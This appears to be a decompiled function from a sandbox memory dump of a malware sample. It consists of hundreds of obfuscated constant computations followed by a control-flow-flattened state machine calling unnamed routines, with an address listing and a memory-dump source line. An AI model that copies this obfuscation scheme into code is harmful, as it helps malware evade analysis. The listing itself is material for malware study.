                                                                                                                      				_v52 = _v52 & 0;
                                                                                                                      				_t766 = 0x41de8e2;
                                                                                                                      				_v48 = _v48 & 0;
                                                                                                                      				_v300 = 0x1109eb;
                                                                                                                      				_v300 = _v300 + 0xcb;
                                                                                                                      				_v300 = _v300 | 0xecff95c2;
                                                                                                                      				_v300 = _v300 ^ 0xa1bddbbd;
                                                                                                                      				_v252 = 0xe28eec;
                                                                                                                      				_v252 = _v252 + 0x19d6;
                                                                                                                      				_v252 = _v252 | 0xcaf404bd;
                                                                                                                      				_v252 = _v252 ^ 0xcaf6acfe;
                                                                                                                      				_v124 = 0x517500;
                                                                                                                      				_v124 = _v124 + 0x84ec;
                                                                                                                      				_v124 = _v124 ^ 0x0051f9ec;
                                                                                                                      				_v344 = 0xbde49;
                                                                                                                      				_t772 = 0x31;
                                                                                                                      				_v344 = _v344 * 0x35;
                                                                                                                      				_v344 = _v344 << 9;
                                                                                                                      				_v344 = _v344 + 0x7afe;
                                                                                                                      				_v344 = _v344 ^ 0xea0ab4fe;
                                                                                                                      				_v232 = 0xd06c4e;
                                                                                                                      				_v232 = _v232 | 0x98bd8447;
                                                                                                                      				_v232 = _v232 + 0xffff492f;
                                                                                                                      				_v232 = _v232 ^ 0x98fd357e;
                                                                                                                      				_v236 = 0xf2a19d;
                                                                                                                      				_v236 = _v236 << 8;
                                                                                                                      				_v236 = _v236 | 0xeb063d66;
                                                                                                                      				_v236 = _v236 ^ 0xfba7bd66;
                                                                                                                      				_v304 = 0x7cba75;
                                                                                                                      				_v304 = _v304 << 0x10;
                                                                                                                      				_v304 = _v304 >> 0xd;
                                                                                                                      				_v304 = _v304 ^ 0x0005d3a8;
                                                                                                                      				_v220 = 0xced2db;
                                                                                                                      				_v220 = _v220 >> 0xb;
                                                                                                                      				_v220 = _v220 * 0x6a;
                                                                                                                      				_v220 = _v220 ^ 0x000ab444;
                                                                                                                      				_v356 = 0x98a5e4;
                                                                                                                      				_v356 = _v356 ^ 0xdd9204f6;
                                                                                                                      				_v356 = _v356 | 0x4689a95f;
                                                                                                                      				_v356 = _v356 * 0x48;
                                                                                                                      				_v356 = _v356 ^ 0xdf47a2b8;
                                                                                                                      				_v292 = 0x99ac6b;
                                                                                                                      				_v292 = _v292 * 0x35;
                                                                                                                      				_v292 = _v292 / _t772;
                                                                                                                      				_v292 = _v292 ^ 0x00a637e1;
                                                                                                                      				_v348 = 0x8d86f8;
                                                                                                                      				_v348 = _v348 + 0x9ec9;
                                                                                                                      				_v348 = _v348 + 0xfffff441;
                                                                                                                      				_v348 = _v348 * 0x3a;
                                                                                                                      				_v348 = _v348 ^ 0x2031e474;
                                                                                                                      				_v208 = 0x39dd97;
                                                                                                                      				_v208 = _v208 << 0x10;
                                                                                                                      				_v208 = _v208 + 0x9a19;
                                                                                                                      				_v208 = _v208 ^ 0xdd979a19;
                                                                                                                      				_v100 = 0xd2197;
                                                                                                                      				_v100 = _v100 + 0x97e4;
                                                                                                                      				_v100 = _v100 ^ 0x000db95b;
                                                                                                                      				_v324 = 0x771ce;
                                                                                                                      				_v324 = _v324 << 1;
                                                                                                                      				_v324 = _v324 ^ 0x580a954c;
                                                                                                                      				_v324 = _v324 ^ 0x580cba62;
                                                                                                                      				_v352 = 0xd79a55;
                                                                                                                      				_t867 = 0x4d;
                                                                                                                      				_v352 = _v352 / _t867;
                                                                                                                      				_v352 = _v352 << 5;
                                                                                                                      				_v352 = _v352 + 0xffffa0ed;
                                                                                                                      				_v352 = _v352 ^ 0x005b1fb1;
                                                                                                                      				_v264 = 0xbc6795;
                                                                                                                      				_v264 = _v264 + 0x99f5;
                                                                                                                      				_v264 = _v264 | 0xde86e00c;
                                                                                                                      				_v264 = _v264 ^ 0xdeb9ffad;
                                                                                                                      				_v240 = 0x2649df;
                                                                                                                      				_v240 = _v240 + 0x8f57;
                                                                                                                      				_v240 = _v240 + 0xffffdcf3;
                                                                                                                      				_v240 = _v240 ^ 0x002859eb;
                                                                                                                      				_v180 = 0x284ff;
                                                                                                                      				_v180 = _v180 + 0xfffffbe4;
                                                                                                                      				_v180 = _v180 ^ 0x0004b053;
                                                                                                                      				_v248 = 0x43d81c;
                                                                                                                      				_t773 = 0x2c;
                                                                                                                      				_v248 = _v248 * 0x30;
                                                                                                                      				_v248 = _v248 + 0x77f1;
                                                                                                                      				_v248 = _v248 ^ 0x0cb65cea;
                                                                                                                      				_v164 = 0x561af9;
                                                                                                                      				_v164 = _v164 * 0x5f;
                                                                                                                      				_v164 = _v164 ^ 0x1ff767f2;
                                                                                                                      				_v172 = 0x424117;
                                                                                                                      				_v172 = _v172 / _t773;
                                                                                                                      				_v172 = _v172 ^ 0x000edcdb;
                                                                                                                      				_v336 = 0xedf003;
                                                                                                                      				_v336 = _v336 + 0xffff11da;
                                                                                                                      				_v336 = _v336 >> 2;
                                                                                                                      				_v336 = _v336 >> 9;
                                                                                                                      				_v336 = _v336 ^ 0x000c05d4;
                                                                                                                      				_v216 = 0xec53cc;
                                                                                                                      				_v216 = _v216 | 0x30e2710b;
                                                                                                                      				_v216 = _v216 * 0x1f;
                                                                                                                      				_v216 = _v216 ^ 0xeced0588;
                                                                                                                      				_v224 = 0xc36dcc;
                                                                                                                      				_v224 = _v224 * 0x64;
                                                                                                                      				_v224 = _v224 * 0xc;
                                                                                                                      				_v224 = _v224 ^ 0x9413d5fd;
                                                                                                                      				_v148 = 0x5fde01;
                                                                                                                      				_v148 = _v148 ^ 0x51967584;
                                                                                                                      				_v148 = _v148 ^ 0x51c7dbee;
                                                                                                                      				_v156 = 0x26546c;
                                                                                                                      				_v156 = _v156 ^ 0x8ec08bcd;
                                                                                                                      				_v156 = _v156 ^ 0x8eeee361;
                                                                                                                      				_v396 = 0x210674;
                                                                                                                      				_v396 = _v396 ^ 0xb585172f;
                                                                                                                      				_v396 = _v396 >> 9;
                                                                                                                      				_v396 = _v396 ^ 0x5fa8c9ed;
                                                                                                                      				_v396 = _v396 ^ 0x5ff25ba7;
                                                                                                                      				_v112 = 0xa4fdb5;
                                                                                                                      				_v112 = _v112 ^ 0x7ac22777;
                                                                                                                      				_v112 = _v112 ^ 0x7a606cfd;
                                                                                                                      				_v160 = 0x7fe066;
                                                                                                                      				_v160 = _v160 | 0xe6d7910f;
                                                                                                                      				_v160 = _v160 ^ 0xe6fe40a3;
                                                                                                                      				_v152 = 0xb045a1;
                                                                                                                      				_v152 = _v152 ^ 0x0733bf74;
                                                                                                                      				_v152 = _v152 ^ 0x078d93a6;
                                                                                                                      				_v384 = 0x7bd524;
                                                                                                                      				_v384 = _v384 + 0xffff236c;
                                                                                                                      				_v384 = _v384 * 0x7b;
                                                                                                                      				_v384 = _v384 + 0xffffb98b;
                                                                                                                      				_v384 = _v384 ^ 0x3b1735e1;
                                                                                                                      				_v392 = 0x61d9a1;
                                                                                                                      				_v392 = _v392 + 0xab93;
                                                                                                                      				_v392 = _v392 + 0xffff054c;
                                                                                                                      				_v392 = _v392 | 0xc62dc39c;
                                                                                                                      				_v392 = _v392 ^ 0xc661791a;
                                                                                                                      				_v376 = 0x1528d1;
                                                                                                                      				_v376 = _v376 << 8;
                                                                                                                      				_v376 = _v376 + 0xffff31a1;
                                                                                                                      				_v376 = _v376 >> 9;
                                                                                                                      				_v376 = _v376 ^ 0x000f3b72;
                                                                                                                      				_v268 = 0x199e3d;
                                                                                                                      				_v268 = _v268 ^ 0x3c18ecc0;
                                                                                                                      				_v268 = _v268 >> 0xf;
                                                                                                                      				_v268 = _v268 ^ 0x00085298;
                                                                                                                      				_v116 = 0x9d324d;
                                                                                                                      				_t774 = 0x5b;
                                                                                                                      				_v116 = _v116 * 0x35;
                                                                                                                      				_v116 = _v116 ^ 0x2088a224;
                                                                                                                      				_v144 = 0xea008e;
                                                                                                                      				_v144 = _v144 * 0x31;
                                                                                                                      				_v144 = _v144 ^ 0x2cc3d943;
                                                                                                                      				_v200 = 0xbe23d7;
                                                                                                                      				_v200 = _v200 / _t774;
                                                                                                                      				_v200 = _v200 ^ 0x0006a720;
                                                                                                                      				_v368 = 0xbc3a01;
                                                                                                                      				_v368 = _v368 >> 2;
                                                                                                                      				_v368 = _v368 << 1;
                                                                                                                      				_v368 = _v368 | 0x91e27348;
                                                                                                                      				_v368 = _v368 ^ 0x91f48308;
                                                                                                                      				_v312 = 0x81ba05;
                                                                                                                      				_v312 = _v312 ^ 0x6d6d273d;
                                                                                                                      				_v312 = _v312 + 0x9af1;
                                                                                                                      				_v312 = _v312 ^ 0x6ded9aad;
                                                                                                                      				_v320 = 0xa9a2ca;
                                                                                                                      				_v320 = _v320 / _t867;
                                                                                                                      				_t775 = 0x39;
                                                                                                                      				_v320 = _v320 / _t775;
                                                                                                                      				_v320 = _v320 ^ 0x0005ef3e;
                                                                                                                      				_v136 = 0x8e55db;
                                                                                                                      				_t776 = 0xb;
                                                                                                                      				_v136 = _v136 / _t776;
                                                                                                                      				_v136 = _v136 ^ 0x00010f6d;
                                                                                                                      				_v296 = 0x9a02a3;
                                                                                                                      				_v296 = _v296 | 0xc0bbeea6;
                                                                                                                      				_v296 = _v296 ^ 0xfebfff47;
                                                                                                                      				_v296 = _v296 ^ 0x3e0de8e7;
                                                                                                                      				_v196 = 0x628794;
                                                                                                                      				_v196 = _v196 >> 7;
                                                                                                                      				_v196 = _v196 ^ 0x00033c53;
                                                                                                                      				_v360 = 0xc75687;
                                                                                                                      				_t777 = 0x55;
                                                                                                                      				_v360 = _v360 / _t777;
                                                                                                                      				_t778 = 0x4a;
                                                                                                                      				_v360 = _v360 / _t778;
                                                                                                                      				_t779 = 0x66;
                                                                                                                      				_v360 = _v360 / _t779;
                                                                                                                      				_v360 = _v360 ^ 0x0006bc1c;
                                                                                                                      				_v288 = 0xb89ddb;
                                                                                                                      				_t780 = 0x5c;
                                                                                                                      				_v288 = _v288 * 0x7b;
                                                                                                                      				_v288 = _v288 + 0x220a;
                                                                                                                      				_v288 = _v288 ^ 0x58b2320e;
                                                                                                                      				_v108 = 0x352a49;
                                                                                                                      				_v108 = _v108 | 0x42677ea4;
                                                                                                                      				_v108 = _v108 ^ 0x427d3f06;
                                                                                                                      				_v332 = 0x1123f9;
                                                                                                                      				_v332 = _v332 + 0xfffffbdd;
                                                                                                                      				_v332 = _v332 + 0xffff8b7f;
                                                                                                                      				_v332 = _v332 | 0xcf6269e1;
                                                                                                                      				_v332 = _v332 ^ 0xcf7a63e7;
                                                                                                                      				_v192 = 0x15ba5c;
                                                                                                                      				_v192 = _v192 + 0xffff7d63;
                                                                                                                      				_v192 = _v192 ^ 0x0011de47;
                                                                                                                      				_v204 = 0xd88287;
                                                                                                                      				_v204 = _v204 >> 1;
                                                                                                                      				_v204 = _v204 ^ 0x006fcfd9;
                                                                                                                      				_v308 = 0x394063;
                                                                                                                      				_v308 = _v308 | 0x23438f89;
                                                                                                                      				_v308 = _v308 ^ 0x95557e79;
                                                                                                                      				_v308 = _v308 ^ 0xb625da34;
                                                                                                                      				_v260 = 0x6632ca;
                                                                                                                      				_v260 = _v260 << 0xc;
                                                                                                                      				_v260 = _v260 / _t780;
                                                                                                                      				_v260 = _v260 ^ 0x011a1b64;
                                                                                                                      				_v316 = 0x1ead1d;
                                                                                                                      				_v316 = _v316 >> 0xf;
                                                                                                                      				_v316 = _v316 << 0xe;
                                                                                                                      				_v316 = _v316 ^ 0x000acc6a;
                                                                                                                      				_v388 = 0xc01c7d;
                                                                                                                      				_v388 = _v388 >> 9;
                                                                                                                      				_v388 = _v388 | 0xa159bc3f;
                                                                                                                      				_v388 = _v388 ^ 0x1058b9c4;
                                                                                                                      				_v388 = _v388 ^ 0xb10bd724;
                                                                                                                      				_v256 = 0x2459a9;
                                                                                                                      				_v256 = _v256 + 0xffff58c0;
                                                                                                                      				_v256 = _v256 >> 0xc;
                                                                                                                      				_v256 = _v256 ^ 0x000386a3;
                                                                                                                      				_v340 = 0xa38d0b;
                                                                                                                      				_t781 = 0x78;
                                                                                                                      				_v340 = _v340 / _t781;
                                                                                                                      				_v340 = _v340 ^ 0x3e3bd45c;
                                                                                                                      				_v340 = _v340 + 0xf3c0;
                                                                                                                      				_v340 = _v340 ^ 0x3e3a819a;
                                                                                                                      				_v380 = 0x2dd945;
                                                                                                                      				_v380 = _v380 << 4;
                                                                                                                      				_v380 = _v380 + 0xffffb7c2;
                                                                                                                      				_v380 = _v380 << 6;
                                                                                                                      				_v380 = _v380 ^ 0xb75574a7;
                                                                                                                      				_v272 = 0xf6939e;
                                                                                                                      				_v272 = _v272 | 0x851c2f86;
                                                                                                                      				_v272 = _v272 + 0xffff0412;
                                                                                                                      				_v272 = _v272 ^ 0x85fd1a3b;
                                                                                                                      				_v188 = 0x2c17e;
                                                                                                                      				_v188 = _v188 >> 3;
                                                                                                                      				_v188 = _v188 ^ 0x000c5ae0;
                                                                                                                      				_v280 = 0xf08b81;
                                                                                                                      				_v280 = _v280 | 0x75266007;
                                                                                                                      				_v280 = _v280 ^ 0xc75f894a;
                                                                                                                      				_v280 = _v280 ^ 0xb2a4e63e;
                                                                                                                      				_v372 = 0x6f48a0;
                                                                                                                      				_v372 = _v372 << 0xa;
                                                                                                                      				_v372 = _v372 >> 0x10;
                                                                                                                      				_v372 = _v372 | 0x5e122b7b;
                                                                                                                      				_v372 = _v372 ^ 0x5e16ce05;
                                                                                                                      				_v184 = 0x747075;
                                                                                                                      				_v184 = _v184 + 0xcea0;
                                                                                                                      				_v184 = _v184 ^ 0x007a5d3b;
                                                                                                                      				_v128 = 0x4ebeca;
                                                                                                                      				_v128 = _v128 + 0xffffee54;
                                                                                                                      				_v128 = _v128 ^ 0x004a846f;
                                                                                                                      				_v120 = 0xe78fe5;
                                                                                                                      				_t868 = 0x80c65ec;
                                                                                                                      				_v120 = _v120 + 0xffff4f7b;
                                                                                                                      				_t864 = 0xf9e92c1;
                                                                                                                      				_v120 = _v120 ^ 0x00e2ece2;
                                                                                                                      				_v276 = 0xe2917e;
                                                                                                                      				_v276 = _v276 << 6;
                                                                                                                      				_v276 = _v276 + 0xffff0dfb;
                                                                                                                      				_v276 = _v276 ^ 0x38a72339;
                                                                                                                      				_v176 = 0x1ec236;
                                                                                                                      				_v176 = _v176 ^ 0x7af5486d;
                                                                                                                      				_v176 = _v176 ^ 0x7aeb8f45;
                                                                                                                      				_v244 = 0x4d92e1;
                                                                                                                      				_t782 = 0x5f;
                                                                                                                      				_v88 = 0x20;
                                                                                                                      				_v244 = _v244 * 0x4a;
                                                                                                                      				_v244 = _v244 | 0x7c3f7c28;
                                                                                                                      				_v244 = _v244 ^ 0x7e7c1ac2;
                                                                                                                      				_v284 = 0xc8aa60;
                                                                                                                      				_v284 = _v284 + 0x32b9;
                                                                                                                      				_v284 = _v284 + 0xffff127a;
                                                                                                                      				_v284 = _v284 ^ 0x00c1b775;
                                                                                                                      				_v228 = 0x32f957;
                                                                                                                      				_v228 = _v228 << 0xa;
                                                                                                                      				_v228 = _v228 ^ 0xe304a089;
                                                                                                                      				_v228 = _v228 ^ 0x28edcf32;
                                                                                                                      				_v364 = 0x1a55e7;
                                                                                                                      				_v364 = _v364 * 0x68;
                                                                                                                      				_v364 = _v364 * 0x36;
                                                                                                                      				_v364 = _v364 ^ 0xa842ca33;
                                                                                                                      				_v364 = _v364 ^ 0xe9f59c27;
                                                                                                                      				_v168 = 0x34b570;
                                                                                                                      				_v168 = _v168 | 0x6b6928c5;
                                                                                                                      				_v168 = _v168 ^ 0x6b739674;
                                                                                                                      				_v104 = 0x8a8082;
                                                                                                                      				_v104 = _v104 * 0x3f;
                                                                                                                      				_v104 = _v104 ^ 0x2214377a;
                                                                                                                      				_v212 = 0x18307b;
                                                                                                                      				_v212 = _v212 ^ 0x4b6e1055;
                                                                                                                      				_v212 = _v212 ^ 0x41119872;
                                                                                                                      				_v212 = _v212 ^ 0x0a6c434c;
                                                                                                                      				_v132 = 0x8b3f3c;
                                                                                                                      				_v132 = _v132 << 2;
                                                                                                                      				_v132 = _v132 ^ 0x022c35f2;
                                                                                                                      				_v328 = 0x314aa5;
                                                                                                                      				_v328 = _v328 | 0xbabb419f;
                                                                                                                      				_v328 = _v328 / _t782;
                                                                                                                      				_v328 = _v328 + 0xe73f;
                                                                                                                      				_v328 = _v328 ^ 0x01f1132e;
                                                                                                                      				_v140 = 0x403514;
                                                                                                                      				_v140 = _v140 + 0xffff4e06;
                                                                                                                      				_v140 = _v140 ^ 0x0039264a;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t783 = 0xf0ee26a;
                                                                                                                      					_t842 = 0xbf4f028;
                                                                                                                      					_t716 = 0xc1f5c56;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t878 = _t766 - _t716;
                                                                                                                      							if(_t878 > 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							if(_t878 == 0) {
                                                                                                                      								_push(_v160);
                                                                                                                      								_push(_v112);
                                                                                                                      								_t732 = E0069DCF7(_v396, 0x681884, __eflags);
                                                                                                                      								_push(_v392);
                                                                                                                      								_t866 = _t732;
                                                                                                                      								_push(_v384);
                                                                                                                      								_t733 = E0069DCF7(_v152, 0x681924, __eflags);
                                                                                                                      								_v76 = _v124;
                                                                                                                      								_t735 = E0068CB52(_v376, _t866, _v268, _v116, _v144);
                                                                                                                      								_v68 = _v68 & 0x00000000;
                                                                                                                      								_v72 = _t866;
                                                                                                                      								_v80 = 2 + _t735 * 2;
                                                                                                                      								_v60 =  &_v80;
                                                                                                                      								_v92 = _v88;
                                                                                                                      								_v64 = 1;
                                                                                                                      								_t741 = E00688D13( &_v32, _v200, _v368,  &_v92, _v84, _t733, _v312,  &_v68, _v88, _v320, _v136, _v236);
                                                                                                                      								_t875 =  &(_t875[0x11]);
                                                                                                                      								__eflags = _t741 - _v304;
                                                                                                                      								_t766 =  ==  ? 0xbf4f028 : 0xf9e92c1;
                                                                                                                      								E0068A8B0(_v296, _t866, _v196);
                                                                                                                      								E0068A8B0(_v360, _t733, _v288);
                                                                                                                      								_t864 = 0xf9e92c1;
                                                                                                                      								goto L24;
                                                                                                                      							} else {
                                                                                                                      								if(_t766 == 0xdec32e) {
                                                                                                                      									_t746 =  *0x6a3dfc; // 0x0
                                                                                                                      									E00698519(_v104, _v212,  *((intOrPtr*)(_t746 + 0x50)));
                                                                                                                      									_t766 = _t864;
                                                                                                                      									while(1) {
                                                                                                                      										L1:
                                                                                                                      										_t783 = 0xf0ee26a;
                                                                                                                      										_t842 = 0xbf4f028;
                                                                                                                      										_t716 = 0xc1f5c56;
                                                                                                                      										goto L2;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t766 == 0x41de8e2) {
                                                                                                                      										_t766 = 0xe078043;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t766 == _t868) {
                                                                                                                      											_push(_v128);
                                                                                                                      											_push(_v184);
                                                                                                                      											_t871 = E0069DCF7(_v372, 0x681904, __eflags);
                                                                                                                      											_t585 =  &_v300; // 0x3e0de8e7
                                                                                                                      											_v44 =  *_t585;
                                                                                                                      											_v40 = _v252;
                                                                                                                      											_pop(_t807);
                                                                                                                      											_v36 = _v100;
                                                                                                                      											_t752 =  *0x6a3dfc; // 0x0
                                                                                                                      											_t754 =  *0x6a3dfc; // 0x0
                                                                                                                      											_t755 =  *0x6a3dfc; // 0x0
                                                                                                                      											_t757 = E0069D84C(_t807, _v120, _t755 + 0x64, _v276,  *((intOrPtr*)(_t754 + 0x54)), _v96, _v176, _v244, _v284, _v228, _v292, _t807, _t748,  &_v44,  *((intOrPtr*)(_t752 + 0x50)));
                                                                                                                      											_t875 =  &(_t875[0xd]);
                                                                                                                      											__eflags = _t757 - _v348;
                                                                                                                      											if(_t757 != _v348) {
                                                                                                                      												_t766 = 0xdec32e;
                                                                                                                      											} else {
                                                                                                                      												_t766 = _t864;
                                                                                                                      												_t873 = 1;
                                                                                                                      											}
                                                                                                                      											E0068A8B0(_v364, _t871, _v168);
                                                                                                                      											goto L24;
                                                                                                                      										} else {
                                                                                                                      											_t882 = _t766 - _t842;
                                                                                                                      											if(_t766 == _t842) {
                                                                                                                      												_push(_v192);
                                                                                                                      												_push(_v332);
                                                                                                                      												_t759 = E0069DCF7(_v108, 0x6818b4, _t882);
                                                                                                                      												_pop(_t812);
                                                                                                                      												_t760 =  *0x6a3dfc; // 0x0
                                                                                                                      												E006A0B68(_t759,  &_v92, _v220, _v204, _t812, _t760 + 0x54, _v308, _v260, _v316, _v388, _v96, _v256);
                                                                                                                      												_t766 =  ==  ? 0xf0ee26a : _t864;
                                                                                                                      												E0068A8B0(_v340, _t759, _v380);
                                                                                                                      												L23:
                                                                                                                      												_t875 =  &(_t875[0xb]);
                                                                                                                      												L24:
                                                                                                                      												_t842 = 0xbf4f028;
                                                                                                                      												_t783 = 0xf0ee26a;
                                                                                                                      												_t868 = 0x80c65ec;
                                                                                                                      												_t716 = 0xc1f5c56;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      										goto L25;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L20:
                                                                                                                      							return _t873;
                                                                                                                      						}
                                                                                                                      						__eflags = _t766 - 0xe078043;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							_push(_v264);
                                                                                                                      							_push(_v352);
                                                                                                                      							_t717 = E0069DCF7(_v324, 0x6818e4, __eflags);
                                                                                                                      							_push(_v248);
                                                                                                                      							_push(_v180);
                                                                                                                      							_t718 = E0069DCF7(_v240, 0x681814, __eflags);
                                                                                                                      							_t665 =  &_v172; // 0x39264a
                                                                                                                      							__eflags = E00689462(_t717,  *_t665,  &_v96, _t718, _v336, _v344) - _v232;
                                                                                                                      							_t766 =  ==  ? 0xc1f5c56 : 0x1d0239b;
                                                                                                                      							E0068A8B0(_v216, _t717, _v224);
                                                                                                                      							E0068A8B0(_v148, _t718, _v156);
                                                                                                                      							_t864 = 0xf9e92c1;
                                                                                                                      							goto L23;
                                                                                                                      						} else {
                                                                                                                      							__eflags = _t766 - _t783;
                                                                                                                      							if(_t766 == _t783) {
                                                                                                                      								_t848 =  *0x6a3dfc; // 0x0
                                                                                                                      								_push(_t783);
                                                                                                                      								_push(_t783);
                                                                                                                      								_t792 = E00687FF2( *((intOrPtr*)(_t848 + 0x54)));
                                                                                                                      								_t730 =  *0x6a3dfc; // 0x0
                                                                                                                      								__eflags = _t792;
                                                                                                                      								_t766 =  !=  ? _t868 : _t864;
                                                                                                                      								 *((intOrPtr*)(_t730 + 0x50)) = _t792;
                                                                                                                      								goto L1;
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t766 - _t864;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									goto L25;
                                                                                                                      								} else {
                                                                                                                      									_t646 =  &_v140; // 0x39264a
                                                                                                                      									E0068957D(_v96, _v132, _v328, _v208,  *_t646);
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L20;
                                                                                                                      						L25:
                                                                                                                      					} while (_t766 != 0x1d0239b);
                                                                                                                      					goto L20;
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x00682f58
                                                                                                                      0x00682f60
                                                                                                                      0x00682f6b
                                                                                                                      0x00682f7e
                                                                                                                      0x00682f85
                                                                                                                      0x00682f90
                                                                                                                      0x00682fa3
                                                                                                                      0x00682fb2
                                                                                                                      0x00682fb9
                                                                                                                      0x00682fc4
                                                                                                                      0x00682fcf
                                                                                                                      0x00682fda
                                                                                                                      0x00682fe5
                                                                                                                      0x00682ff0
                                                                                                                      0x00682ffb
                                                                                                                      0x00683006
                                                                                                                      0x0068300e
                                                                                                                      0x00683016
                                                                                                                      0x0068301b
                                                                                                                      0x00683023
                                                                                                                      0x0068302b
                                                                                                                      0x00683036
                                                                                                                      0x00683041
                                                                                                                      0x0068304c
                                                                                                                      0x00683057
                                                                                                                      0x00683062
                                                                                                                      0x0068306d
                                                                                                                      0x00683078
                                                                                                                      0x00683083
                                                                                                                      0x0068308e
                                                                                                                      0x00683096
                                                                                                                      0x006830a3
                                                                                                                      0x006830a7
                                                                                                                      0x006830af
                                                                                                                      0x006830b7
                                                                                                                      0x006830bf
                                                                                                                      0x006830c7
                                                                                                                      0x006830cf
                                                                                                                      0x006830d7
                                                                                                                      0x006830df
                                                                                                                      0x006830e9
                                                                                                                      0x006830ee
                                                                                                                      0x006830f6
                                                                                                                      0x006830fb
                                                                                                                      0x00683103
                                                                                                                      0x0068310e
                                                                                                                      0x00683119
                                                                                                                      0x00683121
                                                                                                                      0x0068312c
                                                                                                                      0x00683141
                                                                                                                      0x00683144
                                                                                                                      0x0068314b
                                                                                                                      0x00683156
                                                                                                                      0x00683169
                                                                                                                      0x00683170
                                                                                                                      0x0068317b
                                                                                                                      0x00683191
                                                                                                                      0x00683198
                                                                                                                      0x006831a3
                                                                                                                      0x006831ab
                                                                                                                      0x006831b0
                                                                                                                      0x006831b4
                                                                                                                      0x006831bc
                                                                                                                      0x006831c4
                                                                                                                      0x006831cc
                                                                                                                      0x006831d4
                                                                                                                      0x006831dc
                                                                                                                      0x006831e4
                                                                                                                      0x006831f4
                                                                                                                      0x006831fc
                                                                                                                      0x00683201
                                                                                                                      0x00683207
                                                                                                                      0x0068320f
                                                                                                                      0x00683221
                                                                                                                      0x00683226
                                                                                                                      0x0068322f
                                                                                                                      0x0068323a
                                                                                                                      0x00683242
                                                                                                                      0x0068324a
                                                                                                                      0x00683252
                                                                                                                      0x0068325a
                                                                                                                      0x00683265
                                                                                                                      0x0068326d
                                                                                                                      0x00683278
                                                                                                                      0x00683284
                                                                                                                      0x00683289
                                                                                                                      0x00683293
                                                                                                                      0x00683298
                                                                                                                      0x006832a2
                                                                                                                      0x006832a5
                                                                                                                      0x006832a9
                                                                                                                      0x006832b1
                                                                                                                      0x006832c2
                                                                                                                      0x006832c5
                                                                                                                      0x006832cc
                                                                                                                      0x006832d7
                                                                                                                      0x006832e2
                                                                                                                      0x006832ed
                                                                                                                      0x006832f8
                                                                                                                      0x00683303
                                                                                                                      0x0068330b
                                                                                                                      0x00683313
                                                                                                                      0x0068331b
                                                                                                                      0x00683323
                                                                                                                      0x0068332b
                                                                                                                      0x00683336
                                                                                                                      0x00683341
                                                                                                                      0x0068334c
                                                                                                                      0x00683357
                                                                                                                      0x0068335e
                                                                                                                      0x00683369
                                                                                                                      0x00683371
                                                                                                                      0x00683379
                                                                                                                      0x00683381
                                                                                                                      0x00683389
                                                                                                                      0x00683394
                                                                                                                      0x006833a7
                                                                                                                      0x006833ae
                                                                                                                      0x006833b9
                                                                                                                      0x006833c1
                                                                                                                      0x006833c6
                                                                                                                      0x006833cb
                                                                                                                      0x006833d3
                                                                                                                      0x006833db
                                                                                                                      0x006833e0
                                                                                                                      0x006833e8
                                                                                                                      0x006833f0
                                                                                                                      0x006833f8
                                                                                                                      0x00683403
                                                                                                                      0x0068340e
                                                                                                                      0x00683416
                                                                                                                      0x00683421
                                                                                                                      0x0068342d
                                                                                                                      0x00683430
                                                                                                                      0x00683434
                                                                                                                      0x0068343c
                                                                                                                      0x00683444
                                                                                                                      0x0068344c
                                                                                                                      0x00683454
                                                                                                                      0x00683459
                                                                                                                      0x00683461
                                                                                                                      0x00683466
                                                                                                                      0x0068346e
                                                                                                                      0x00683479
                                                                                                                      0x00683484
                                                                                                                      0x0068348f
                                                                                                                      0x0068349a
                                                                                                                      0x006834a5
                                                                                                                      0x006834ad
                                                                                                                      0x006834b8
                                                                                                                      0x006834c3
                                                                                                                      0x006834ce
                                                                                                                      0x006834d9
                                                                                                                      0x006834e4
                                                                                                                      0x006834ec
                                                                                                                      0x006834f1
                                                                                                                      0x006834f6
                                                                                                                      0x006834fe
                                                                                                                      0x00683506
                                                                                                                      0x00683511
                                                                                                                      0x0068351c
                                                                                                                      0x00683527
                                                                                                                      0x00683532
                                                                                                                      0x0068353d
                                                                                                                      0x0068354a
                                                                                                                      0x00683555
                                                                                                                      0x0068355a
                                                                                                                      0x00683565
                                                                                                                      0x0068356a
                                                                                                                      0x00683575
                                                                                                                      0x00683580
                                                                                                                      0x00683588
                                                                                                                      0x00683593
                                                                                                                      0x0068359e
                                                                                                                      0x006835a9
                                                                                                                      0x006835b4
                                                                                                                      0x006835bf
                                                                                                                      0x006835d4
                                                                                                                      0x006835d5
                                                                                                                      0x006835e0
                                                                                                                      0x006835e7
                                                                                                                      0x006835f2
                                                                                                                      0x006835fd
                                                                                                                      0x00683608
                                                                                                                      0x00683613
                                                                                                                      0x0068361e
                                                                                                                      0x00683629
                                                                                                                      0x00683634
                                                                                                                      0x0068363c
                                                                                                                      0x00683647
                                                                                                                      0x00683652
                                                                                                                      0x0068365f
                                                                                                                      0x00683668
                                                                                                                      0x0068366c
                                                                                                                      0x00683674
                                                                                                                      0x0068367c
                                                                                                                      0x00683687
                                                                                                                      0x00683692
                                                                                                                      0x0068369d
                                                                                                                      0x006836b0
                                                                                                                      0x006836b7
                                                                                                                      0x006836c2
                                                                                                                      0x006836cd
                                                                                                                      0x006836d8
                                                                                                                      0x006836e3
                                                                                                                      0x006836ee
                                                                                                                      0x006836f9
                                                                                                                      0x00683701
                                                                                                                      0x0068370c
                                                                                                                      0x00683714
                                                                                                                      0x00683722
                                                                                                                      0x00683726
                                                                                                                      0x0068372e
                                                                                                                      0x00683736
                                                                                                                      0x00683741
                                                                                                                      0x0068374c
                                                                                                                      0x00683757

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
